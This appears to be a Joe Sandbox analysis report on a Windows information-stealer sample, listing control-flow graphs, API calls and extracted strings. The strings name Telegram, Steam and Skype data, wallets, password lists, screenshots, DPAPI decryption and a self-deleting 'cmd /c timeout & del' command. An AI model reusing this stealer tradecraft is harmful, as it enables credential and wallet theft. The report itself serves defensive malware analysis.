              • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
              • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
              • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
              • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
              • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
              • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
              • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
              • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
              • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
              • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
              • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
              • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
              • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
              • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
              • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
              • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
              • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
              • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
              • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
              • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
              • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
              • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
              • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
              • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
              • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
              • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
              • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
              • GetProcAddress.KERNEL32(75A50000,EnumDisplayDevicesW), ref: 00405A14
              • GetProcAddress.KERNEL32(75A50000,wvsprintfA), ref: 00405A29
              • GetProcAddress.KERNEL32(75A50000,GetKeyboardLayoutList), ref: 00405A3E
              • LoadLibraryA.KERNEL32(shell32.dll,75A50000,GetKeyboardLayoutList,75A50000,wvsprintfA,75A50000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
              • GetProcAddress.KERNEL32(75320000,ShellExecuteExW), ref: 00405A62
              • LoadLibraryA.KERNEL32(ntdll.dll,75320000,ShellExecuteExW,shell32.dll,75A50000,GetKeyboardLayoutList,75A50000,wvsprintfA,75A50000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
              • GetProcAddress.KERNEL32(76E80000,RtlComputeCrc32), ref: 00405A86
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$LibraryLoad
              • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
              • API String ID: 2238633743-617434850
              • Opcode ID: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
              • Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
              • Opcode Fuzzy Hash: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
              • Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C

              Control-flow Graph

              APIs
              • _sprintf.LIBCMT ref: 00423724
              • _sprintf.LIBCMT ref: 0042372F
                • Part of subcall function 00425B7E: __output_l.LIBCMT ref: 00425BD9
              • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004238D5
              • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004238E1
              • GetStringTypeA.KERNEL32(00000000,00000000,0043CFC0,00000000,?), ref: 004238F9
              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00423912
              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0042391C
              • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042392A
              • MoveFileWithProgressA.KERNEL32(0043D014,0043CFF8,00000000,00000000,00000000), ref: 00423940
              • Sleep.KERNEL32(00000000), ref: 00423948
              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00423952
              • _malloc.LIBCMT ref: 0042396C
                • Part of subcall function 00425AEA: __FF_MSGBANNER.LIBCMT ref: 00425B03
                • Part of subcall function 00425AEA: __NMSG_WRITE.LIBCMT ref: 00425B0A
                • Part of subcall function 00425AEA: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00425B2F
              • _calloc.LIBCMT ref: 00423976
              • GetTickCount.KERNEL32 ref: 0042399F
              • IsProcessorFeaturePresent.KERNEL32(00000000), ref: 004239B3
              • GlobalAlloc.KERNEL32(00000000), ref: 00423A0A
              • LoadLibraryW.KERNEL32(0043D028), ref: 00423BB5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: Wait$EnumFormatsObjectSingleTime_sprintf$AllocAllocateCountFeatureFileFormatGlobalHeapLibraryLoadMessageMoveMultipleObjectsPresentProcessorProgressSleepStringTickTypeWith__output_l_calloc_malloc
              • String ID: >2$%9M $)Wc.$+$,mSw$2g?$8h-Y$;!|?$="<s$>gw:$>u8e$?t8f$H&!$I;-A$IE_|$Kb5B$SOsX$YYj$['Ml$\<4$^js{$_kdu$_IM$b5g$boQd$bu5\$jb`{$jtI/$k3AH$kJH/$n(N;$pkA4$yjYZ$z(6V$|s]$ ^@$OR$aI^$kZ,$l|L$|MG
              • API String ID: 3256033748-1437113064
              • Opcode ID: 8e16e7c29b1a57dfc68f0dae3e932c8777c9b14869131708a6b3611a210a561d
              • Instruction ID: fe8835b111e3e69dd0f2492bcd7bc76d5d244d183e8102dd78082b8b93f8fb56
              • Opcode Fuzzy Hash: 8e16e7c29b1a57dfc68f0dae3e932c8777c9b14869131708a6b3611a210a561d
              • Instruction Fuzzy Hash: 42D221B4A05368CFDBA18F2ADC8978CBBB8BB15304F5441D8E2496A251CB755FC5CF0A

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 61 419108-41910b 62 419110-419115 61->62 62->62 63 419117-4191a8 call 403980 call 4034e4 call 40357c call 40561c call 407d24 call 406c4c call 403798 call 403990 CreateMutexA 62->63 81 419f30-41a139 call 4034e4 call 403b98 call 4034e4 call 403b98 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 403508 call 404224 call 403508 call 4034e4 * 2 call 403508 * 2 call 4034e4 63->81 82 4191ae-4191bb call 4034e4 63->82 88 4191c0-4191c3 82->88 90 4191c5-4191e2 call 4036cc call 403798 88->90 91 4191e4-419237 call 418f9c call 406c4c call 406810 call 4037dc call 4176d8 call 418688 88->91 90->88 90->91 119 41923c-419259 call 4176d8 call 403790 91->119 119->81 129 41925f-41926c call 4038dc 119->129 129->81 134 419272-419321 call 407428 call 406984 call 407428 call 406ae4 call 40795c call 407428 call 406984 call 4080c4 call 408328 call 40dc44 call 4045ec 129->134 180 419327-419328 134->180 181 419909-419c2e call 417290 call 403850 call 40dce8 call 406c4c call 406810 call 407a4c call 406810 call 406bb4 call 40377c call 406810 call 4066c0 call 40377c call 406810 call 406610 call 40377c call 406810 call 4065cc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 * 2 call 407d24 call 406810 call 403850 call 403798 call 4063a4 call 40653c call 40dee4 call 403850 134->181 185 41932a-419338 call 403790 180->185 458 419c30-419c54 call 403850 call 403798 181->458 459 419c59-419ca1 call 4176d8 call 418688 call 4050c8 call 403790 181->459 194 419901-419903 185->194 195 41933e-419340 185->195 194->181 194->185 198 419492-41949b 195->198 199 419346-419350 195->199 202 4194a1-4194d0 call 40795c call 40357c call 403a78 198->202 203 419825-41982e 198->203 204 419372-41937c 199->204 205 419352-41936d call 40d7f0 call 4053d8 call 40dce8 199->205 267 419742-419820 call 403d2c * 2 call 407048 call 4038dc * 2 call 403850 call 403d2c * 2 call 4037dc call 403d2c call 414408 202->267 268 4194d6-419503 call 407428 202->268 211 419830-419846 call 403850 203->211 212 41984b-419854 203->212 206 4193b1-4193bb 204->206 207 41937e-4193ac call 414028 call 408120 call 405528 call 40dce8 204->207 205->204 219 4193c2-4193cc 206->219 220 4193bd call 414098 206->220 207->206 211->212 212->194 221 41985a-41987d call 40795c call 4038dc 212->221 223 4193ec-4193f6 219->223 224 4193ce-4193e0 call 415ea8 219->224 220->219 260 4198f1-4198fc call 40dce8 221->260 261 41987f-4198ef call 418688 call 407428 * 2 call 403850 call 40dce8 221->261 234 419402-41940c 223->234 235 4193f8-4193fd call 414cb8 223->235 224->223 252 4193e2-4193e7 call 4050c8 224->252 246 41942f-419439 234->246 247 41940e-41942a call 414408 234->247 235->234 256 419445-41944f 246->256 257 41943b-419440 call 414f40 246->257 247->246 252->223 269 419451-41947d GetSystemMetrics * 2 call 4178b4 call 40dce8 256->269 270 419482-41948c 256->270 257->256 260->194 261->194 267->203 268->81 298 419509-41950f 268->298 269->270 270->198 274 41948e 270->274 274->198 303 419734-419737 298->303 306 419514-41954a call 406fdc call 40377c call 403a78 303->306 307 41973d 303->307 347 419731 306->347 348 419550-41972c call 403c98 call 403850 call 403d2c * 2 call 4070bc call 40377c call 4034e4 call 403850 call 403d2c call 4070bc call 403d58 call 40377c call 403d2c call 40781c call 40377c call 403d2c * 2 call 407048 call 4038dc * 2 call 4037dc call 403d2c * 2 call 4037dc call 403d2c call 414408 306->348 307->203 347->303 348->347 458->459 472 419db1-419dd1 call 4087dc call 407d24 call 4038dc 459->472 473 419ca7-419cc4 call 40795c call 4045ec 459->473 487 419dd3-419de0 call 4038dc 472->487 488 419dec-419df9 call 4038dc 472->488 473->472 482 419cca-419ccb 473->482 484 419ccd-419d03 call 4047a8 call 40795c call 4045ec 482->484 505 419da9-419dab 484->505 506 419d09-419d18 call 4038dc 484->506 487->488 497 419de2-419de7 call 407dd4 487->497 488->81 495 419dff-419e03 488->495 495->81 498 419e09-419f2b call 4028e0 call 4062d8 call 403d3c call 4062d8 call 402754 call 403d2c call 40770c call 403e1c call 403d3c call 402754 call 403d2c call 407798 call 403d3c ExitProcess 495->498 497->81 505->472 505->484 506->505 511 419d1e-419d42 call 40795c call 4045ec 506->511 521 419d85-419d89 511->521 522 419d44-419d45 511->522 521->505 525 419d8b-419da4 call 4038dc call 418cf4 521->525 524 419d4c-419d7d call 406318 call 403a78 522->524 524->521 539 419d7f-419d83 524->539 525->505 539->521 539->524
              APIs
              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00419195
                • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
              • GetSystemMetrics.USER32(00000001), ref: 00419460
              • GetSystemMetrics.USER32(00000000), ref: 00419468
              • ExitProcess.KERNEL32(00000000), ref: 00419F2B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
              • String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
              • API String ID: 447519224-805684967
              • Opcode ID: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
              • Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
              • Opcode Fuzzy Hash: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
              • Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 811 784a90-784a9b 812 784a9d 811->812 813 784aa0-784cb7 call 785493 call 78584c call 7857e4 VirtualAlloc 811->813 812->813 828 784cb9-784cdd call 7854bd 813->828 829 784cdf-784ce6 813->829 832 784d22-784e16 VirtualProtect call 785722 call 78573b 828->832 830 784cf5-784d04 829->830 830->832 833 784d06-784d20 830->833 840 784e25-784e34 832->840 833->830 841 784e8d-784f0c VirtualFree 840->841 842 784e36-784e8b call 78573b 840->842 844 785048-785052 841->844 845 784f12-784f21 841->845 842->840 847 785058-785061 844->847 848 7851d3-7851dd 844->848 846 784f27-784f31 845->846 846->844 850 784f37-784f59 LoadLibraryA 846->850 847->848 853 785067-78508b 847->853 851 7851fa-785204 848->851 852 7851df-7851f7 848->852 855 784f6b-784f74 850->855 856 784f5b-784f69 850->856 857 78520a-78521f 851->857 858 7852c2-785312 LoadLibraryA 851->858 852->851 859 784f7a-784f9b 855->859 856->859 860 785226-785229 857->860 861 78531b-78534d 858->861 862 784fa1-784fa4 859->862 863 785278-785287 860->863 864 78522b-785234 860->864 865 78534f-785355 861->865 866 785356-785371 861->866 867 784faa-784fbf 862->867 868 785034-785043 862->868 871 78528d-785290 863->871 869 785238-785276 864->869 870 785236 864->870 865->866 872 784fc1 867->872 873 784fc3-784fce 867->873 868->846 869->860 870->863 871->858 874 785292-78529b 871->874 872->868 876 784fef-78500f 873->876 877 784fd0-784fed 873->877 878 78529d 874->878 879 78529f-7852c0 874->879 883 785011-78502f 876->883 877->883 878->858 879->871 883->862
              APIs
              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00784CA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AllocVirtual
              • String ID: cess$kernel32.dll
              • API String ID: 4275171209-1230238691
              • Opcode ID: 1d3f1b4fa1104d12923b2607602187910ab13e8cafb3ea4eab99c5b4f5fef507
              • Instruction ID: b148caaf183ba31bcc180eb39713418755c7552310afdf56f3d6143cd1db32a4
              • Opcode Fuzzy Hash: 1d3f1b4fa1104d12923b2607602187910ab13e8cafb3ea4eab99c5b4f5fef507
              • Instruction Fuzzy Hash: 04127A74A01229DFDB64CFA8C985B9CBBB1BF09304F1480D9E54DAB352DB34AA84DF15

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 884 40955e-409567 885 409583 884->885 886 409569-40957e LoadLibraryA GetProcAddress 884->886 886->885
              APIs
              • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
              • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: CryptUnprotectData$crypt32.dll
              • API String ID: 2574300362-1827663648
              • Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
              • Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
              • Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
              • Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 887 407c58-407ca2 889 407ca4-407cf0 LookupAccountSidA CheckTokenMembership 887->889 890 407d1d-407d23 887->890 891 407cf2-407cf7 889->891 892 407cf9-407cfc 889->892 893 407cff-407d15 FreeSid 891->893 892->893
              APIs
              • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
              • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
              • FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AccountCheckFreeLookupMembershipToken
              • String ID:
              • API String ID: 1602037265-0
              • Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
              • Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
              • Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
              • Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 912 7850c0-7850c8 913 7850ce-7850dd 912->913 914 7850e3-785106 913->914 915 7851a4-7851ce 913->915 917 785108-785141 914->917 918 785143-785150 914->918 919 7850a2-7850ae 915->919 920 7851d3-7851dd 915->920 917->918 921 78519f 918->921 922 785152-78519c 918->922 919->920 925 7850b4-7850be 919->925 923 7851fa-785204 920->923 924 7851df-7851f7 920->924 921->912 922->921 926 78520a-78521f 923->926 927 7852c2-785312 LoadLibraryA 923->927 924->923 925->913 928 785226-785229 926->928 929 78531b-78534d 927->929 930 785278-785287 928->930 931 78522b-785234 928->931 932 78534f-785355 929->932 933 785356-785371 929->933 936 78528d-785290 930->936 934 785238-785276 931->934 935 785236 931->935 932->933 934->928 935->930 936->927 937 785292-78529b 936->937 939 78529d 937->939 940 78529f-7852c0 937->940 939->927 940->936
              APIs
              • LoadLibraryA.KERNEL32(msvcr100.dll), ref: 007852EE
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: LibraryLoad
              • String ID: msvcr100.dll
              • API String ID: 1029625771-4078232268
              • Opcode ID: d62b7385236eb3342a17d9e4d87b611e39e3cf254c0d8c16f175d63fcb1c783e
              • Instruction ID: 43f6034ec803c5cd3b553355b3c4496bd814a2dd1b2a8b55d13cf52f91180e83
              • Opcode Fuzzy Hash: d62b7385236eb3342a17d9e4d87b611e39e3cf254c0d8c16f175d63fcb1c783e
              • Instruction Fuzzy Hash: AC917E74A402698FDB64CF58C984BA8B7B1BF09304F1581E9E40EA7751DB34AEC4DF14

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 942 4040f4-4040f8 943 404112 942->943 944 4040fa-40410a SysAllocStringLen 942->944 945 403b50 944->945 946 404110 944->946 945->942 946->943
              APIs
              • SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
              Strings
              • SOFTWARE\Microsoft\Cryptography, xrefs: 00404101
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AllocString
              • String ID: SOFTWARE\Microsoft\Cryptography
              • API String ID: 2525500382-1514646153
              • Opcode ID: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
              • Instruction ID: 809722c095ea45080b132ee1ecccaea0ad8e4e48b5b2181e80121cad3d0a43f6
              • Opcode Fuzzy Hash: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
              • Instruction Fuzzy Hash: E6D012F42001025AD7489F198555A37776E5BD1700368C6BEA101BF2D5DB39E841EB34

              Control-flow Graph

              APIs
                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
              • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
              • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AllocOpenQueryStringValue
              • String ID:
              • API String ID: 4139485348-0
              • Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
              • Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
              • Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
              • Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 968 4033f4-40340b 969 403423-40342a 968->969 970 40340d-403410 968->970 971 40342c-403438 call 4032dc call 403368 969->971 972 40343d-403441 969->972 970->969 973 403412-403421 970->973 971->972 975 403443-403446 972->975 976 40344d-403456 call 4031dc 972->976 973->969 975->976 978 403448-40344a 975->978 984 403458-40345b 976->984 985 40345d-403462 976->985 978->976 984->985 986 40347e-403487 call 4031b4 984->986 985->986 987 403464-403472 call 404890 985->987 993 403489 986->993 994 40348c-403490 986->994 987->986 992 403474-403476 987->992 992->986 995 403478-403479 FreeLibrary 992->995 993->994 996 403492 call 403338 994->996 997 403497-40349a 994->997 995->986 996->997 999 4034b3 997->999 1000 40349c-4034a3 997->1000 1001 4034a5 1000->1001 1002 4034ab-4034ae ExitProcess 1000->1002 1001->1002
              APIs
              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: ExitFreeLibraryProcess
              • String ID:
              • API String ID: 1404682716-0
              • Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
              • Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
              • Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
              • Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD
              APIs
              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: ExitFreeLibraryProcess
              • String ID:
              • API String ID: 1404682716-0
              • Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
              • Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
              • Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
              • Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799
              APIs
              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: ExitFreeLibraryProcess
              • String ID:
              • API String ID: 1404682716-0
              • Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
              • Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
              • Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
              • Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D
              APIs
                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
              • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
